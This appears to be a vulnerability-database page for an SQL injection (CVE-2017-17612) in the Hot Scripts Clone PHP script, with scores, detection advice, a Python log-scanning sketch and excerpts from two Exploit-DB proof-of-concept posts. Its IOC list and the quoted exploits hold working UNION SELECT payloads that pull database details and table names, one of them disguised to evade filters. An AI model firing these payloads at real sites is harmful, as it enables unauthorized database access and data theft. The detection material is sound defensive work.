CVE-2017-17612
Published 2017-12-13
CVE-2017-17612: Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.
Priority P260 · critical · 9.8 CVSS 3.0
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 3.66% (88.2th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hot_scripts_clone_project | hot_scripts_clone | — | — |
Detection & IOCs
url: http://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
url: http://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
command: -Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
command: -Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
- Monitor HTTP requests to the /categories endpoint for SQL injection patterns in the 'subctid' parameter, specifically UNION-based payloads with quote characters and comment sequences (--+-).
- Monitor HTTP requests to the /categories endpoint for SQL injection patterns in the 'mctid' parameter, including UNION ALL SELECT payloads targeting INFORMATION_SCHEMA.TABLES.
- Detect the MySQL versioned-comment obfuscation technique (/*!08888UNION*/, /*!08888ALL*/, /*!08888SELECT*/) used in the mctid and subctid parameters to bypass WAFs and filters.
- Detect combined injection attempts where both subctid and mctid are supplied with SQL payloads in the same request.
- The exploit PoC uses [PATH] as a placeholder for the application's installation subdirectory; the /categories endpoint may be at a non-root path depending on deployment.
- The original exploit submissions list the CVE as N/A; the CVE-2017-17612 assignment came later via NVD and covers version 3.1, while exploit EDB-43916 targets version 1.0 of the same product.
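The detection points above can be combined into one access-log check. The following Python sketch is an added example, not a rule from this page or from any vendor; the combined log format, the rule names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PARAMS = ("subctid", "mctid")
VERSIONED_OPEN = re.compile(r"/\*!\d{5}")   # MySQL versioned comment, e.g. /*!08888
COMMENT_CLOSE = re.compile(r"\*/")
RULES = {  # rule names are this example's own
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "information_schema": re.compile(r"information_schema", re.I),
    "versioned_comment": VERSIONED_OPEN,
    "quote_then_comment": re.compile(r"'.*(--\s|#)", re.S),
}

def inspect(line):
    """Return a finding dict for a suspicious /categories request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # The app may be installed under a subdirectory, so match on the path suffix.
    if not url.path.rstrip("/").endswith("/categories"):
        return None
    hits = {}
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name not in PARAMS:
            continue
        # Unwrap /*!NNNNNkeyword*/ so wrapped keywords match the same rules.
        plain = COMMENT_CLOSE.sub(" ", VERSIONED_OPEN.sub(" ", value))
        matched = sorted(r for r, rx in RULES.items()
                         if rx.search(value) or rx.search(plain))
        if matched:
            hits[name] = matched
    if not hits:
        return None
    return {"rules": hits, "combined": len(hits) == len(PARAMS)}

# Constructed access-log lines (combined log format), not taken from real traffic.
SAMPLE_LOG = """
203.0.113.5 - - [13/Dec/2017:10:00:00 +0000] "GET /categories?subctid=12 HTTP/1.1" 200 512
203.0.113.9 - - [13/Dec/2017:10:00:01 +0000] "GET /categories?subctid=-1'+UNION+ALL+SELECT+1--+- HTTP/1.1" 200 733
203.0.113.9 - - [13/Dec/2017:10:00:02 +0000] "GET /categories?&mctid=-1'+UNION+ALL+SELECT+table_name+FROM+INFORMATION_SCHEMA.TABLES--+- HTTP/1.1" 200 901
203.0.113.9 - - [13/Dec/2017:10:00:03 +0000] "GET /shop/categories?keyword=&mctid=-1'+/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+1--+-&subctid=-1'+UNION+SELECT+1--+- HTTP/1.1" 200 640
203.0.113.7 - - [13/Dec/2017:10:00:04 +0000] "GET /search?q=union+select HTTP/1.1" 200 300
""".strip().splitlines()

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect(line))
```

The versioned-comment payload only matches the `union_select` rule after the comment wrappers are stripped, because `08888UNION` has no word boundary before the keyword; matching on the raw value alone would miss it.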
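CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |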
No detection rules found.
Exploit-DB
Hot Scripts Clone - 'subctid' SQL Injection
exploitdb·2018-01-28
---
# # # # #
# Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/categories?keyword=&mctid=[SQL]&subctid=[SQL]
#
# -Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888
Exploit-DB
Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection
exploitdb·2017-12-11
---
# # # # #
# Exploit Title: Hot Scripts Clone 3.1 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/
# Version: 3.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/categories?subctid=[SQL]
#
# -yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
#
# http://server/categories?subctid=-yzEb7895'++UNION+A
No writeups or analysis indexed.
- https://packetstormsecurity.com/files/145324/Hot-Scripts-Clone-3.1-SQL-Injection.html
- https://www.exploit-db.com/exploits/43284/
- https://www.exploit-db.com/exploits/43916/